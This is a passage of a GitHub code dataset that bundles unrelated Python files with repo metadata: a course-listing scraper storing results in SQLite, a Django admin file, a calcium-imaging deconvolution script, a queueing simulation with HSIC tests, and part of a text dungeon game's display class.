continue...\\033[0m')\n\nfleet_processing(auto_fleet)\n\nauto1 = auto_input()\nauto1.print_step()\nauto1.print_message_medium_high_power()\nauto1.tax()\nauto1.range()\n","repo_name":"mariuspodean/CJ-PYTHON-01","sub_path":"lesson_9/mosut_sorin/hw_lesson9_classes_mosut_sorin.py","file_name":"hw_lesson9_classes_mosut_sorin.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"70093325605","text":"from bs4 import BeautifulSoup\r\nimport bs4\r\nimport requests\r\nimport sqlite3\r\nfrom urllib import urlencode\r\n\r\n\r\ntables = {'courses': 'Discipline TEXT, Number TEXT, Title TEXT', \r\n 'offerings': 'YearTerm TEXT, course_id INTEGER, Code INTEGER, ' +\r\n 'Type TEXT, Section TEXT, Units TEXT, Instructor TEXT, Time TEXT, ' + \r\n 'Place TEXT, Capacity INTEGER, Enrolled INTEGER, Waitlisted INTEGER, ' + \r\n 'Requests TEXT, Restrictions TEXT, Books TEXT, Site TEXT, Status TEXT'}\r\n\r\ndef get_tables(db):\r\n return [a[0] for a in db.execute(\"select name from sqlite_master where type = 'table'\").fetchall()]\r\n\r\ndef create_table(db, name, attrs):\r\n if name in get_tables(db):\r\n return\r\n else:\r\n db.execute('CREATE TABLE %s(id INTEGER PRIMARY KEY, %s)' % (name, attrs))\r\n\r\ndef parse_html(html):\r\n soup = BeautifulSoup(html, 'html.parser')\r\n cl = soup.find('div', {'class':'course-list'})\r\n offerings = []\r\n courseInfo = []\r\n for course in cl.find_all('tr', valign='top'):\r\n if course.get('bgcolor') == '#fff0ff':\r\n if len(offerings) > 0:\r\n yield courseInfo, offerings\r\n offerings = []\r\n discNum = course.find('td').text\r\n discNum = [i.strip() for i in discNum.split('\\xa0') if i.strip()]\r\n #keys = ['Discipline', 'Number', 'Title']\r\n courseInfo = [discNum[0], discNum[1], discNum[2]]\r\n else:\r\n info = course.find_all('td')\r\n text = [t.text.replace('\\xa0', '').strip() for t in info]\r\n if len(text) == 13:\r\n text.insert(12, '')\r\n text.append('')\r\n if len(text) == 14:\r\n text.insert(10, '')\r\n if len(text) != 15:\r\n print(text, len(text))\r\n\r\n #keys = ['Code', 'Type', 'Section', 'Units', 'Instructor', 'Time', 'Place', 'Capacity', 'Enrolled', 'Waitlisted', 'Requests', 'Restrictions', 'Books', 'Site', 'Status']\r\n offerings.append(text)\r\n if courseInfo:\r\n yield courseInfo, offerings\r\n\r\ndef query_websoc(**values):\r\n url = 'http://websoc.reg.uci.edu/perl/WebSoc'\r\n data = urlencode(values)\r\n data = data.encode('utf-8')\r\n req = requests.get(url, params=data)\r\n the_page = req.text\r\n return [(course, offerings) for course, offerings in parse_html(the_page)]\r\n\r\ndef get_options(name):\r\n url = 'http://websoc.reg.uci.edu/perl/WebSoc'\r\n req = requests.get(url)\r\n the_page = req.text\r\n bs = BeautifulSoup(the_page, 'html.parser')\r\n s = bs.find('select', {'name': name})\r\n l = []\r\n for opt in s.find_all('option'):\r\n l.append(opt.get('value'))\r\n return l\r\n\r\n\r\ndef open_db(fname='websoc.db'):\r\n db = sqlite3.connect(fname)\r\n create_table(db, 'courses', tables['courses'])\r\n create_table(db, 'offerings', tables['offerings'])\r\n return db\r\n\r\nQUARTERS = {'Summer Session 2': '76', 'Summer Qtr': '51', '10-wk Summer': '39', 'Summer Session 1': '25', 'Spring Quarter': '14', 'Winter Quarter': '03', 'Fall Quarter': '92'}\r\n\r\ndef normalizeYearTerm(year, term):\r\n return '%d-%s' % (year, QUARTERS[term])\r\n\r\ndef scrape_courses(db, Discipline, YearTerm):\r\n cur = db.cursor()\r\n n = 0\r\n for course, offerings in query_websoc(Dept=Discipline, YearTerm=YearTerm):\r\n print(course)\r\n nums = cur.execute('SELECT id FROM courses WHERE Discipline = \"%s\" AND Number = \"%s\"' % (course[0], course[1])).fetchall()\r\n if len(nums) == 0:\r\n cur.execute('INSERT INTO courses(Discipline, Number, Title) VALUES (\"%s\",\"%s\",\"%s\")' % (course[0], course[1], course[2]))\r\n num = cur.lastrowid\r\n elif len(nums) == 1:\r\n num = nums[0][0]\r\n\r\n offerings = [[YearTerm, num] + offering for offering in offerings]\r\n #print([o for o in offerings if len(o) != 17])\r\n cur.executemany('DELETE FROM offerings WHERE YearTerm = ? AND Code = ?', [(off[0], off[2]) for off in offerings])\r\n cur.executemany('INSERT INTO offerings(YearTerm, course_id, Code, Type, Section, Units, Instructor, ' + \r\n 'Time, Place, Capacity, Enrolled, Waitlisted, Requests, Restrictions, Books, Site, Status) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', offerings)\r\n \r\n db.commit()\r\n n += 1\r\n \r\n\r\ndef scrape_yearterm(db, YearTerm):\r\n for disc in get_options('Dept'):\r\n scrape_courses(db, Discipline=disc, YearTerm=YearTerm)\r\n\r\ndef update_db(db):\r\n cur = db.cursor()\r\n yt_opts = get_options('YearTerm')\r\n yts = cur.execute('SELECT DISTINCT YearTerm FROM offerings''').fetchall()\r\n yts = [yt[0] for yt in yts]\r\n yts = set(yt_opts) - set(yts)\r\n for yt in yts:\r\n print('Scraping %s' % yt)\r\n scrape_yearterm(db, yt)\r\n\r\ndef make_db(db):\r\n \r\n DEPTS = get_options(\"Dept\")\r\n yts = get_options('YearTerm')\r\n for school in DEPTS:\r\n for yearterm in yts:\r\n if school != ' ALL':\r\n scrape_courses(db, Discipline=school, YearTerm=yearterm)\r\n \r\n return db\r\n\r\ndef get_class(dept, num):\r\n db = open_db()\r\n \r\n\r\ndef console(db):\r\n from PyQt4 import QtGui\r\n app = QtGui.QApplication([])\r\n from pyqtgraph.console import ConsoleWidget\r\n cw = ConsoleWidget()\r\n cw.localNamespace.update(globals())\r\n cw.localNamespace.update(locals())\r\n cw.show()\r\n app.exec_()\r\n\r\ndef classes_like(db, num):\r\n num = num.replace('@', '_')\r\n cur = db.cursor()\r\n vals = cur.execute('''SELECT DISTINCT Number FROM courses WHERE Number like \"%s\"''' % num).fetchall()\r\n return [v[0] for v in vals]\r\n\r\nif __name__ == '__main__':\r\n db = open_db()\r\n print(classes_like(db, \"@1@@W\"))\r\n #make_db(db)\r\n #console(db)\r\n db.close()\r\n \r\n","repo_name":"BrettJSettle/ZotPlanner","sub_path":"cgi/old/websoc_scraper.py","file_name":"websoc_scraper.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"27101468835","text":"from django.contrib import admin\nfrom . import models\n# Register your models here.\n\n\nclass PhotoInline(admin.TabularInline):\n model = models.Photo\n\n\n@admin.register(models.Equiptment)\nclass EquiptmentAdmin(admin.ModelAdmin):\n \"\"\"EquiptmentAdmin Admin Definition\"\"\"\n inlines = (PhotoInline,)\n\n","repo_name":"areum514/highfive","sub_path":"equipments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18479870798","text":"from pathlib import Path\n\nimport caiman\nimport caiman.source_extraction.cnmf as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.ndimage\nfrom sklearn import preprocessing\n\nNAS_PROC_DIR = Path(\"/local/storage/Remy/natural_mixtures/processed_data\")\nstat_file_list = sorted(list(NAS_PROC_DIR.rglob('combined/stat.npy')))\n\n#%%\ndef load_traces(stat_file):\n F = np.load(stat_file.with_name('F.npy'))\n Fneu = np.load(stat_file.with_name('Fneu.npy'))\n iscell = np.load(stat_file.with_name('iscell.npy'))\n\n# def detrend_df_f(C, quantile_min=8, frames_window=200, return_baseline=False):\n# \"\"\" Compute dF/F, with baseline computed w/ rolling percentile window.\n#\n# :param C:\n# :param quantile_min:\n# :param frames_window:\n# :return:\n# \"\"\"\n# F0 = scipy.ndimage.percentile_filter(C, quantile_min, (frames_window, 1))\n# C_df = C./F0\n\ndef correct_and_deconvolve(C, oasis_params, quantile_norm=True):\n \"\"\"\n Takes parameters for baseline correction (suite2p.dcnv.preprocess) and deconvolution (oasis AR2, constrained\n foopsi) and returns block-corrected traces.\n\n :param Fc: neuropil-corrected fluorescence from suite2p ( = F - 0.7 * Fneu)\n :type Fc: np.ndarray\n \"\"\"\n n_cells, T = C.shape\n\n # quantile matching & transform, quantile_range=(0.25, 0.75)\n if quantile_norm:\n d = preprocessing.RobustScaler(with_centering=False).fit_transform(C)\n else:\n d = C\n\n # oasis deconvolution\n C_dec = np.zeros(d.shape)\n Bl = np.zeros(n_cells)\n C1 = np.zeros(d.shape)\n G = np.zeros((n_cells, 2))\n Sn = np.zeros(n_cells)\n Sp = np.zeros((n_cells, T))\n Lam = np.zeros(n_cells)\n\n for cid in range(C_dec.shape[0]):\n y = d[cid, :]\n\n #g0 = caiman.source_extraction.cnmf.deconvolution.estimate_time_constant(y, p=2, lags=5, fudge_factor=1.)\n #g = caiman.source_extraction.cnmf.deconvolution.estimate_time_constant(y, p=1, lags=10)\n c, bl, c1, g, sn, sp, lam = caiman.source_extraction.cnmf.deconvolution.constrained_foopsi(y, **oasis_params)\n C_dec[cid, :] = c\n Bl[cid] = bl\n C1[cid] = c1\n G[cid, :] = g\n Sp[cid, :] = sp\n #Sn[cid] = cm.deconvolution.GetSn(y)\n Sn[cid] = sn\n Lam[cid] = lam\n\n oasis_results = dict(C_dec=C_dec, bl=Bl, c1=C1, g=G, sp=Sp, sn=Sn, lam=Lam, oasis_params=oasis_params)\n return d, oasis_results\n\ndef load_and_detrend_F(stat_file):\n F = np.load(stat_file.with_name('F.npy'))\n Fneu = np.load(stat_file.with_name('Fneu.npy'))\n # iscell = np.load(stat_file.with_name('iscell.npy'))\n #cellprob = iscell[:, 1]\n #iscell = iscell[:, 0]\n\n Fneu_smoothed = scipy.ndimage.gaussian_filter1d(Fneu, sigma=3, axis=1, )\n Fc = F - 0.7 * Fneu_smoothed\n\n # detrend neuropil-corrected fluorescence\n F0 = scipy.ndimage.percentile_filter(Fc, 20, (1, 200)) # baseline\n C_df = (Fc - F0)/F0 # dF/F\n return C_df, Fc, F0\n\n\ndef main(stat_file):\n C_df, Fc, F0 = load_and_detrend_F(stat_file)\n\n # caiman deconvolution\n oasis_params = dict(p=1,\n penalty=0,\n g=np.array([.88]),\n smin=1,\n #lags=10,\n #smin=None,\n g_optimize=3,\n )\n C_qtn, oasis_results = correct_and_deconvolve(C_df, oasis_params=oasis_params, quantile_norm=False)\n\n save_file = stat_file.with_name('caiman_deconv_results.npy')\n np.save(save_file,\n dict(Fc=Fc, F0=F0, C_df=C_df, C_qtn=C_qtn, oasis_results=oasis_results),\n allow_pickle=True)\n return save_file\n\n#%%\nstat_file_list = stat_file_list[2:]\nsaved_files = []\n\nfor item in stat_file_list:\n print(f\"\\n{item.relative_to(NAS_PROC_DIR)}\")\n saved_files.append(main(item))\n print('file saved')\n\n\n\n\n#%%\n\n# sn_fcc = [cm.deconvolution.GetSn(y, method='mean') for y in Fcc]\n#\n# upper_quantile = np.percentile(Fcc, 75, axis=1)\n# lower_quantile = np.percentile(Fcc, 25, axis=1)\n# scaling_factor = upper_quantile - lower_quantile\n# Fcc = (Fcc-lower_quantile[:, np.newaxis])/scaling_factor[:, np.newaxis]\n\n#%% plot oasis results for list of cells\ncids = np.arange(0, 5)+40\n\nfig, axarr = plt.subplots(nrows=len(cids), ncols=1, figsize=(12, 10), sharey='col', tight_layout=True)\n\nfor cid, ax in zip(cids, axarr.flat):\n print(cid)\n #ax.plot(C_qtn[cid, :])\n #ax.plot(C_qtn[cid, :] - oasis_results['bl'][cid])\n #sn = oasis_results['sn'][cid]\n y = C_qtn[cid, :] - oasis_results['bl'][cid]\n #ax.axhline(np.percentile(y, 50))\n\n ax.plot(y)\n ax.plot(oasis_results['C_dec'][cid, :])\n ax.set_title(f\"cid={cid} |\"\n f\" snr={oasis_results['sn'][cid]:.3f}|\"\n f\" g={oasis_results['g'][cid]}|\"\n f\" lambda={oasis_results['lam'][cid]:.3f} | \"\n )\nplt.show()\n\n#%%\n# F0 = scipy.ndimage.percentile_filter(Fc, 8, (1, 350))\n#\n# cids = np.arange(0, 5)+100\n# fig, axarr = plt.subplots(nrows=len(cids), ncols=1, sharey='col',\n# figsize=(12, 10),\n# tight_layout=True)\n#\n# for cid, ax in zip(cids, axarr.flat):\n# ax.plot(Fc[cid, :])\n# ax.plot(F0[cid, :])\n# plt.show()\n# #%%\n#\n# fig, axarr = plt.subplots(nrows=len(cids), ncols=1, figsize=(12, 10), sharey='col', tight_layout=True)\n# for cid, ax in zip(cids, axarr.flat):\n# ax.plot(Fc[cid, :])\n# ax.plot(F[cid, :])\n# ax.plot(F_smoothed[cid, :])\n# ax.plot(Fneu_smoothed[cid, :])\n# plt.show()\n# #%% plot bulk fluorescence\n#\n# fig, axarr = plt.subplots(nrows=2, ncols=1)\n# Ftot = F.sum(axis=0) - 0.7* Fneu.sum(axis=0)\n# F0 = scipy.ndimage.percentile_filter(Ftot, 10, 200)\n#\n# axarr[0].plot(Ftot)\n# axarr[0].plot(F0)\n# #axarr[0].plot(Fneu.sum(axis=0))\n# axarr[1].plot((Ftot-F0)/F0)\n# plt.show()\n","repo_name":"jyang-2/CalciumVolumetric","sub_path":"src/suite2p_postprocess_outputs.py","file_name":"suite2p_postprocess_outputs.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39490382113","text":"#!/bin/python\n\nimport gc\nimport io\nimport multiprocessing as mp\nimport time\nfrom contextlib import redirect_stdout\nfrom parallelqueue.base_models import *\nfrom parallelqueue.monitors import *\n\nfrom redundancy import hsic\n\nncpus = mp.cpu_count()\n\n# %%\n\n# User-set params\nsimrep = int(input(\"Number of reps: \")) # set to cores utilized in parallel to limit amount held in memory\nif simrep > ncpus: print(\"simrep should be <= to be safe\")\nToOrder = [5, 50, 100, 500] # N values to test\n# WARNING: N values too high can r/esult in memory leaks!\nseed = int(input(\"seed: \"))\nmaxtime = float(input(\"maxtime: \")) # max time used across all sims\nmintime = float(input(\"mintime: \"))\nrng = hsic.spanning_grid_uniform(maxtime - 1, mintime) # times to sample\nalpha = 0.1\n\n# %%\n\nprint(f\"Using ncpus={simrep}\")\n\n\nclass Concurrent:\n def __init__(self, maxtime=1000, rho=0.9, d=2, r=2,\n order=range(2, 1000, 2), seed=123):\n self.rhoJSim = None\n self.r = r\n self.order = order\n self.d = d\n self.rho = rho\n self.maxtime = maxtime\n self._ts = None\n self.seed = seed\n\n def WriteEach(self, simrep=1, of=[\"TSim\"], ts=True):\n \"\"\" v rep within run\n res['Thresh(2,2)'][0][0].keys()\n ^run (N-size)\n Out[9]: dict_keys(['ReplicaSets', 'TimeQueueSize'])\"\"\"\n self._ts = ts\n self._sims = simrep\n labels = {self.RSim: f\"Redundancy({self.d})\", self.JSim: f\"JSQ({self.d})\",\n self.TSim: f\"Thresh({self.d},{self.r})\"}\n self.res = {}\n for sim in [self.__getattribute__(i) for i in of]:\n print(f\"Running {sim}\")\n self.res[labels[sim]] = self.ParallelSim(sim)\n\n def DoEach(self, of=[\"TSim\"], iters=1):\n self._ts = False\n labels = {self.RSim: f\"Redundancy({self.d})\", self.JSim: f\"JSQ({self.d})\",\n self.TSim: f\"Thresh({self.d},{self.r})\"}\n self.res = {}\n for sim in [self.__getattribute__(i) for i in of]:\n print(f\"Running {sim}\")\n results = self.ParallelSim(sim)\n self.res[labels[sim]] = pd.DataFrame(results)\n\n\n def RSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = RedundancyQueueSystem(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps,\n d=self.d,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def JSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = JSQd(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps, d=self.d,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def TSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = ParallelQueueSystem(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps,\n d=self.d,\n r=self.r,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def ParallelSim(self, sim):\n with mp.Pool(processes=ncpus) as p:\n res = p.map(sim, range(self._sims))\n return res\n\n def Results(self):\n return self.res\n\n\ndef SafeRun(maxtime=1000, rho=0.9, d=2, r=2, order=range(2, 20, 2),\n of=\"TSim\", seed=123, simrep=1, ts=True): # Throws out Concurrent when done\n \"\"\"\n Parallelized simulations with lambda such that\n rho = (d*lambda)/(mu*N) and mu = 1\n <=> lambda = (N*rho)/d.\n \"\"\"\n run = Concurrent(maxtime, rho, d, r, order, seed)\n run.WriteEach(of=[of], simrep=simrep, ts=ts)\n return run.Results()\n\n\n# %%\n\ndef rearrange_for_test(results, which=0, ToOrder=ToOrder):\n per_queue = {q: [] for q in range(ToOrder[which])}\n for sim in range(simrep):\n sim_results = results[sim][0][\"TimeQueueSize\"]\n queue_times = {q: {} for q in range(ToOrder[which])}\n for time, value in sim_results.items():\n for queue in range(ToOrder[which]):\n queue_times[queue][time] = value[queue]\n\n for queue in range(ToOrder[which]):\n per_queue[queue].append(queue_times[queue])\n return per_queue\n\n\ndef arr_t(X):\n return np.array(X).transpose()\n\n\ngc.collect() # clear memory of clutter from imports\n\n\n# %%\n\n# Outputs in tex tabular style\ndef sig(a):\n if a < 0.01:\n return \"***\"\n elif a < 0.05:\n return \"**\"\n elif a < 0.1:\n return \"*\"\n return \"\"\n\n\nwith open(f\"output/{maxtime}fintabular_{seed}_{rng[:3]}..._{alpha}:{time.time()}.txt\", \"w\") as ls:\n ls.write(f\"\\hline \\n\")\n ls.write(f\"$\\\\rho$ & $N$ & $r$ & $\\\\hat p(H_{'{a}'})$ \\\\\\ \\n\")\n ls.write(f\"\\hline \\n\")\n ls.write(f\"\\hline \\n\")\n ls.flush()\n for r in [0.8, 0.9, 0.99]: # values of rho to test\n for thresh in [1, 2]:\n for i in range(len(ToOrder)):\n results = SafeRun(of=\"TSim\", order=[ToOrder[i]], maxtime=maxtime, rho=r, r=thresh, simrep=simrep,\n ts=False, seed=seed)\n results = results[list(results.keys())[0]] #\n sim_per_queue = rearrange_for_test(results, i)\n del results\n gc.collect()\n f = io.StringIO()\n with redirect_stdout(f):\n data_sim = [arr_t(hsic.time_sampler(sim_per_queue[m], rng)) for m in range(ToOrder[i])]\n del sim_per_queue\n test = hsic.dHSIC_resample_test(data_sim, 500)\n assert test <= 1\n ls.write(\n f\"{r if i == 0 and thresh == 2 else ''} & {ToOrder[i]} & {thresh} & {round(test, 3) if test is not None else None} {sig(test)} \\\\\\ \\n\")\n if i == 4 and thresh == 2:\n ls.write(f\"\\hline \\n\")\n ls.flush()\n del data_sim\n gc.collect()\n ls.close()\nexit()\n\n","repo_name":"aarjaneiro/RedundancyPaper","sub_path":"Analysis/hsic_module.py","file_name":"hsic_module.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9295465762","text":"import os\nimport platform\n\n\nclass View:\n \"\"\"\n This Class handles every console input/output of the game\n and passes it to forward to controller.\n This Class exists to isolate the disorder of long strings and prints\n from other classes, to keep every other class as clean as possible.\n \"\"\"\n\n welcome_menu = [\"Welcome to... DUNGEON RUN!\",\n \"[1] New Character\",\n \"[2] Load Character\",\n \"[3] Load AI Character\",\n \"[4] Highest score\",\n \"[5] Quit\"]\n\n start_location = [\"Choose your starting location:\",\n \"[1] North-West\",\n \"[2] North-East\",\n \"[3] South-West\",\n \"[4] South-East\"]\n\n choose_role = [\"Please choose your role:\",\n \"[1] Knight\",\n \"[2] Wizard\",\n \"[3] Thief\"]\n\n choose_size = [\"Please choose your mapsize:\",\n \"[1] 4x4\",\n \"[2] 5x5\",\n \"[3] 8x8\"]\n\n choose_AI = [\"Please choose AI:\",\n \"[1] AI Knight\",\n \"[2] AI Wizard\",\n \"[3] AI Thief\"]\n\n highscore = [\"Display highscore:\",\n \"number 1 is me\",\n \"number 2 is you\",\n \"number 3 is some other dude\"]\n\n player_load_stats = [\"---- Stats for loaded player ----\", # 0\n \"Total runs: \", # 2\n \"\", # 3\n \"- Monsters killed -\", # 4\n \"Giant Spiders: \", # 5\n \"Skeletons: \", # 6\n \"Orcs: \", # 7\n \"Trolls: \", # 8\n \"\", # 9\n \"Treasures collected: \", # 1\n \"Accumulated score: \", # 10\n \"\", #11\n \"Enter to start game\"] #12\n\n choose_corner = [\"Choose your starting location:\",\n \"[1] North-West\",\n \"[2] North-East\",\n \"[3] South-West\",\n \"[4] South-East\"]\n\n direction_option = [\" [N] North \",\n \"[W] West [E] East\",\n \" [S] South \"]\n\n attack_options = [\"[1] Attack!\",\n \"[2] Flee!\"]\n\n leave_options = [\"[1] Yes\",\n \"[2] No\"]\n\n good_bye = [\"Thanks for playing!\", \"\", \"/Sonsofbjorn\"]\n\n enter_go_back = [\"\", \"\", \"[ENTER] to return.\"]\n\n stats_count = [\"\", \"---- Killed Monsters ----\",\n \"Giant Spider: \",\n \"Skeletons: \",\n \"Orcs: \",\n \"Troll: \",\n \"\",\n \"Tresure count: \", \"Total Score: \", \"\", \"\", \"\"]\n\n enter_char_name = [\"\", \"Enter character name: \", \"\", \"\", \"\", \"\", \"\", \"Type 'back' to return\"]\n\n leave_question = [\"You see a staircaise,\", \"do you want to leave?\"]\n\n show_monsters = [\"Uhuh! ENEMIES! You see the following foes: \"]\n\n player_is_dead = [\"\", \"Character has died and cannot be played!\"]\n score_text = [\"Your current score is: \"]\n loot_text = [\"You found loot! The following loot was added to your backback: \"]\n player_dead = [\"You have been slained by the\"]\n player_killed = [\"You have slain the \"]\n player_escaped = [\"You have escaped!\"]\n player_failed_escape = [\"You have failed to escape!\"]\n player_hit = [\"You hit the\"]\n monster_hit = [\"You have been hit by the\"]\n for_one_dmg = [\"for 1 damage\"]\n player_miss = [\"You missed\"]\n monster_miss = [\"Missed!\"]\n player_crit = [\" You did a critical hit to \"]\n shield_block = [\"Your shield blocked the attack from \"]\n hit = [\" hit \"]\n you_died = [\"You have died!\", \"All your loot this round was lost\", \"and not added to your highscore\", \"\", \"[ENTER] to return\"]\n exit_score = [\"The score has been added to your highscore!\"]\n\n \"\"\" ERROR MESESAGES BELLOW \"\"\"\n error_msg = []\n err_choice = [\"\", \"Invalid choice!\"]\n err_long_name = [\"\", \"Max 18 characters!\"]\n err_invalid_char = [\"\", \"Invalid character ','\"]\n err_player_exists = [\"\", \"Player name is taken\"]\n err_player_not_exist = [\"\", \"Player does not exist\"]\n err_load_error = [\"\", \"Load error, ask Micke\"]\n \"\"\" END OF ERROR MESSAGES\"\"\"\n\n \"\"\" COLOR DICTIONARY BELOW\"\"\"\n colors = {\n \"red\": \"\\033[31m\",\n \"green\": \"\\033[32m\",\n \"yellow\": \"\\033[33m\"\n }\n\n def clear_console(self):\n if platform.system() == \"Linux\":\n return os.system('clear')\n if platform.system() == \"Darwin\":\n return os.system('clear')\n elif platform.system() == \"Windows\":\n return os.system('cls')\n\n def draw_map(self, player, dungeon):\n \"\"\"\n This takes in player and dungeon object\n Returns a list with the map and player loc\n \"\"\"\n output = []\n outrow = \"\"\n for row in dungeon:\n for n in range(3):\n for room in row:\n if room.position == player.show_location:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n elif n == 1:\n out = \"░░╳░░░\"\n else:\n out = \"░░░░░░\"\n elif room.has_exit and room.is_dark is False:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n if n == 1:\n out = \"░EXIT░\"\n else:\n out = \"░░░░░░\"\n elif not room.is_dark and len(room.get_room_monsters()) > 0:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n else:\n out = \"░░░░░░\"\n elif room.is_dark:\n out = \"▓▓▓▓▓▓\"\n else:\n out = \"░░░░░░\"\n outrow += out\n output.append(outrow)\n outrow = \"\"\n return output\n\n def print_main_menu(self, input_menu, *args, **kwargs):\n \"\"\"\n Prints main menu, takes in *args which can be list, or strings and\n will be printed as the menu.\n **kwargs is a keyword argument if you want to show extra information,\n you will then send in an extra string/list.\n \"\"\"\n self.clear_console()\n print(\"\\033[31m\"+\"______ \".center(os.get_terminal_size().columns))\n print(\"| _ \\ \".center(os.get_terminal_size().columns))\n print(\"| | | | _ _ _ __ __ _ ___ ___ _ __ _ __ _ _ _ __ \".center(os.get_terminal_size().columns))\n print(\"| | | || | | || '_ \\ / _` | / _ \\ / _ \\ | '_ \\ | '__|| | | || '_ \\ \".center(os.get_terminal_size().columns))\n print(\"| |/ / | |_| || | | || (_| || __/| (_) || | | || | | |_| || | | |\".center(os.get_terminal_size().columns))\n print(\"|___/ \\__,_||_| |_| \\__, | \\___| \\___/ |_| |_||_| \\__,_||_| |_|\".center(os.get_terminal_size().columns))\n print(\"\\033[32m\"+\" ╔═════════════\\033[31m __/ | \\033[32m══════════════════════════════╗ \".center(os.get_terminal_size().columns+10), end=\"\")\n print(\" ║ \\033[31m|___/\\033[32m ║ \".center(os.get_terminal_size().columns+10))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n\n menu = []\n\n if isinstance(input_menu, str) or not hasattr(input_menu, \"__iter__\"):\n menu.append(input_menu)\n else:\n menu = input_menu.copy()\n\n if kwargs:\n if isinstance(args[0], str) or not hasattr(args[0], \"__iter__\"):\n to_list = list()\n to_list.append(args[0])\n else:\n to_list = args[0]\n menu += to_list\n for row in menu:\n row = (\"║\"+row.center(50)+\"║\")\n print(row.center(os.get_terminal_size().columns))\n\n if len(menu) < 10:\n count = 10 - len(menu)\n for i in range(count):\n hehe1 = (\"║\"+\" \"*50+\"║\")\n print(hehe1.center(os.get_terminal_size().columns))\n print(\"╚══════════════════════════════════════════════════╝\".center(os.get_terminal_size().columns))\n menu = []\n\n def print_game(self, player, dungeon, input_menu, *args, **kwargs):\n \"\"\"\n This prints all the GFX for the game loop.\n Needs player object, dungeon and a menu list. Use *args and **kwargs\n to display extra information addition to the menu list.\n\n *args = an extra list of information we want to display\n **kwargs = is a keyword boolean and should be true if we want to\n show extra info.\n \"\"\"\n\n self.clear_console()\n print(\"{red} ______ \".format(red=self.colors.get(\"red\")).center(os.get_terminal_size().columns+5))\n print(\"| _ \\ \".center(os.get_terminal_size().columns))\n print(\"| | | | _ _ _ __ __ _ ___ ___ _ __ _ __ _ _ _ __ \".center(os.get_terminal_size().columns))\n print(\"| | | || | | || '_ \\ / _` | / _ \\ / _ \\ | '_ \\ | '__|| | | || '_ \\ \".center(os.get_terminal_size().columns))\n print(\"| |/ / | |_| || | | || (_| || __/| (_) || | | || | | |_| || | | |\".center(os.get_terminal_size().columns))\n print(\"|___/ \\__,_||_| |_| \\__, | \\___| \\___/ |_| |_||_| \\__,_||_| |_|\".center(os.get_terminal_size().columns))\n print(\"{green} ╔══════════════════{red} __/ | {green}═══════════════════════════════════╗ \".format(red=self.colors.get(\"red\"), green=self.colors.get(\"green\")).center(os.get_terminal_size().columns+16), end=\"\")\n print(\" ║ {red}|___/{green} ║ \".format(red=self.colors.get(\"red\"), green=self.colors.get(\"green\")).center(os.get_terminal_size().columns+8))\n print(\" ║ MAP m = One monster ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ╳ = YOUR LOCATION M = More than one monster ║ \".center(os.get_terminal_size().columns))\n playerbox = self.print_hp_score_list(player)\n monsterbox = self.print_monster_hp(player)\n playerbox_cursor = 0\n monsterbox_cursor = 0\n dungeonmap = self.draw_map(player, dungeon)\n if len(dungeonmap) < 13:\n for x in range(6):\n if len(player.current_room.monsters) > 0:\n formated_output = (monsterbox[monsterbox_cursor]+\"║\" + \" \" * 60 + \"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns))\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n formated_output = (\"║\" + \" \" * 60 + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns+22), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns-22))\n playerbox_cursor += 1\n monsterbox_cursor += 1\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = 